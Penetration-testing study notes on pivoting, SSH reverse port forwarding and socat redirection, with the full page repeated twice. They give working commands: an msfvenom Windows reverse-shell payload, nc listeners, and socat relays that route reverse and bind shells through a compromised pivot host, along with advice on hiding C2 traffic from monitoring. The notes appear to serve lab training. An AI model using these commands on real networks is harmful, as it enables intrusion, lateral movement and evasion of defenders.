Pivoting, Tunneling, and Port Forwarding

PreviousFuzzing Subdomains and Virtual hosts NextPivoting around obstacles

Last updated 1 year ago

Pivoting, Tunneling, and Port Forwarding

What is Pivoting?

The act of using a compromised system as a platform to attack other systems within a network that would not be reachable through our local attack machine

what is the Purpose of pivoting

Pivoting allows an attack to move laterally through the network, escalate privileges, widen the attack landscape and access other machines from a network we otherwise would not initially be able to access

Pivoting example

Let's say we have an attacker at 192.168.0.1, our attacker can interact with the public-facing web server, but not any of the workstations within the internal 10.10.1.0/24 subnet.
Our public-facing web server has two network interfaces 10.10.0.1/24 (reachable by the public) and eth1 10.10.1.1/24 (allows the web server to communicate with the internal network and vise versa)
The attacker compromises the Public-Facing web server
Using the Public-Facing web server as a pivot point the attacker can now essentially push his traffic from 192.168.0.1 (Attacker) -> 10.10.0.1 (Compromised Web Server) -> 10.10.1.1 (Internal Interface of Web Server) -> 10.10.1.0/24 (Internal Subnet) therefore reaching the internal workstations

What is Tunneling

Tunneling involves encapsulating one network protocol within another to create a secure communications channel over an insecure network between two devices/systems

Why would a Pentester use tunnelling?

Obfuscation! As a penetration tester or red teamer we don't want our actions on the machine to be monitored so what do we do? create a secure connection, hide our traffic within a SSH tunnel, hide our c2 traffic within HTTP traffic, Pivoting, etc, it is used to enhance ones capabilities, privacy, and navigation through defenses that are in place

What is Port Forwarding?

a networking technique that allows data traffic to be redirected from one port on a computer to another port on a separate computer
Port forwarding uses TCP primarily
Protocols such as SSH and SOCKS can be used to encapsulate the forwarded traffic

Why would this be useful?

Port forwarding allows a penetration tester to create a secure tunnel, granting access to remote internal service, by mapping a local port to a remote port
can be effective to bypass firewalls, and other defenses placed in the network

Remote/Reverse Port Forwarding with SSH

used to expose services from a remote machine to our local machine securely, think of it like creating a reverse tunnel from the remote machine to our local machine
The remote server establishes a tunnel back to the local machine, allowing external systems to connect to the specified port on the remote server, which then is forwarded to our local machine

example

The windows machine is only limited to the 172.16.5.0/23 network, us the attackers cannot interact with the 172.16.5.0/23 network directory, if we where to upload a reverse shell and execute it within the windows host it could not directory establish a connection to the attackers machine on 10.10.15.5
We need the reverse-shell to execute on the windows machine, but connect to the middle man, pivot point, etc (ubuntu machine) because it is accessible by both the attack host and windows machine, then from the ubuntu machine we set up a remote/reverse port forward back to our attacking machine, where ultimately allows traffic coming from both attack host to the windows machine and vice versa

Lets say we are generate a msfvenom payload that will be executed on the windows machine

msfvenom -p windows/x64/shell_reverse_tcp lhost=172.16.5.129(ubuntuMachine(pivotPoint) lport=9000 -f exe -o rev.exe

we can set up a listener on any port on our local machine

rlwrap -cAr nc -lvnp 1234

Notice the port on our lhost parameter and our listening port on our local machine dont match, they dont have to since we are going to set up a remote/reverse port forward on the ubuntu machine (our pivot point)

setting up our pivot point

local machine


ssh -R <IPofInternalNetwork>:<PortWeSpecifiedForCallBack>:<attackHost>:<attackHostPort> ubuntu@10.129.15.50 -vN
ssh -R 172.16.5.129:9000:0.0.0.0:1234 ubuntu@10.129.15.50 -vN

-R: Sets up the port forwarding, it fowards the traffic from port 9000 on the ubuntu machine (pivot point) to port 1234 on our local machine (attack Host)
-v: verbose mode
-N: Do not execute commands on the remote host (ubuntu) after connecting, useful for when you just want to set up the port forwarding without running any commands

Socat Redirection with a Reverse Shell

what is Socat?

is a bidirectional relay tool that can create pipe sockets between two independent network channels without the need for SSH tunneling
It acts as a redirector that can listen on one host and port and forward data to another IP address and port

example

we have placed so cat on the ubuntu machine our public-facing web server

./socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

socat will listen on port 8080 and forward all the traffic to our local machine on port 80
from here we can construct a payload that will connect back to our listener on the ubuntu machine port 8080, then socat will redirect to our local port 80 where we will be listening

socat Redirection with a bind shell

we can also create a socat bind redirector

example

the target server Windows (172.16.5.19) will start a listener and bind a particular port, we can initiate a socat redirector within the pivot point (ubuntu) which will listen for incoming connections and forward straight to the bind port on the windows machine

starting a socat bind shell listener

socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

PreviousFuzzing Subdomains and Virtual hosts NextPivoting around obstacles

Last updated 1 year ago

What is Pivoting?

The act of using a compromised system as a platform to attack other systems within a network that would not be reachable through our local attack machine

what is the Purpose of pivoting

Pivoting allows an attack to move laterally through the network, escalate privileges, widen the attack landscape and access other machines from a network we otherwise would not initially be able to access

Pivoting example

Let's say we have an attacker at 192.168.0.1, our attacker can interact with the public-facing web server, but not any of the workstations within the internal 10.10.1.0/24 subnet.
Our public-facing web server has two network interfaces 10.10.0.1/24 (reachable by the public) and eth1 10.10.1.1/24 (allows the web server to communicate with the internal network and vise versa)
The attacker compromises the Public-Facing web server
Using the Public-Facing web server as a pivot point the attacker can now essentially push his traffic from 192.168.0.1 (Attacker) -> 10.10.0.1 (Compromised Web Server) -> 10.10.1.1 (Internal Interface of Web Server) -> 10.10.1.0/24 (Internal Subnet) therefore reaching the internal workstations

What is Tunneling

Tunneling involves encapsulating one network protocol within another to create a secure communications channel over an insecure network between two devices/systems

Why would a Pentester use tunnelling?

Obfuscation! As a penetration tester or red teamer we don't want our actions on the machine to be monitored so what do we do? create a secure connection, hide our traffic within a SSH tunnel, hide our c2 traffic within HTTP traffic, Pivoting, etc, it is used to enhance ones capabilities, privacy, and navigation through defenses that are in place

What is Port Forwarding?

a networking technique that allows data traffic to be redirected from one port on a computer to another port on a separate computer
Port forwarding uses TCP primarily
Protocols such as SSH and SOCKS can be used to encapsulate the forwarded traffic

Why would this be useful?

Port forwarding allows a penetration tester to create a secure tunnel, granting access to remote internal service, by mapping a local port to a remote port
can be effective to bypass firewalls, and other defenses placed in the network

Remote/Reverse Port Forwarding with SSH

used to expose services from a remote machine to our local machine securely, think of it like creating a reverse tunnel from the remote machine to our local machine
The remote server establishes a tunnel back to the local machine, allowing external systems to connect to the specified port on the remote server, which then is forwarded to our local machine

example

The windows machine is only limited to the 172.16.5.0/23 network, us the attackers cannot interact with the 172.16.5.0/23 network directory, if we where to upload a reverse shell and execute it within the windows host it could not directory establish a connection to the attackers machine on 10.10.15.5
We need the reverse-shell to execute on the windows machine, but connect to the middle man, pivot point, etc (ubuntu machine) because it is accessible by both the attack host and windows machine, then from the ubuntu machine we set up a remote/reverse port forward back to our attacking machine, where ultimately allows traffic coming from both attack host to the windows machine and vice versa

Lets say we are generate a msfvenom payload that will be executed on the windows machine

msfvenom -p windows/x64/shell_reverse_tcp lhost=172.16.5.129(ubuntuMachine(pivotPoint) lport=9000 -f exe -o rev.exe

we can set up a listener on any port on our local machine

rlwrap -cAr nc -lvnp 1234

Notice the port on our lhost parameter and our listening port on our local machine dont match, they dont have to since we are going to set up a remote/reverse port forward on the ubuntu machine (our pivot point)

setting up our pivot point

local machine


ssh -R <IPofInternalNetwork>:<PortWeSpecifiedForCallBack>:<attackHost>:<attackHostPort> ubuntu@10.129.15.50 -vN
ssh -R 172.16.5.129:9000:0.0.0.0:1234 ubuntu@10.129.15.50 -vN

-R: Sets up the port forwarding, it fowards the traffic from port 9000 on the ubuntu machine (pivot point) to port 1234 on our local machine (attack Host)
-v: verbose mode
-N: Do not execute commands on the remote host (ubuntu) after connecting, useful for when you just want to set up the port forwarding without running any commands

Socat Redirection with a Reverse Shell

what is Socat?

is a bidirectional relay tool that can create pipe sockets between two independent network channels without the need for SSH tunneling
It acts as a redirector that can listen on one host and port and forward data to another IP address and port

example

we have placed so cat on the ubuntu machine our public-facing web server

./socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

socat will listen on port 8080 and forward all the traffic to our local machine on port 80
from here we can construct a payload that will connect back to our listener on the ubuntu machine port 8080, then socat will redirect to our local port 80 where we will be listening

socat Redirection with a bind shell

we can also create a socat bind redirector

example

the target server Windows (172.16.5.19) will start a listener and bind a particular port, we can initiate a socat redirector within the pivot point (ubuntu) which will listen for incoming connections and forward straight to the bind port on the windows machine

starting a socat bind shell listener

socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443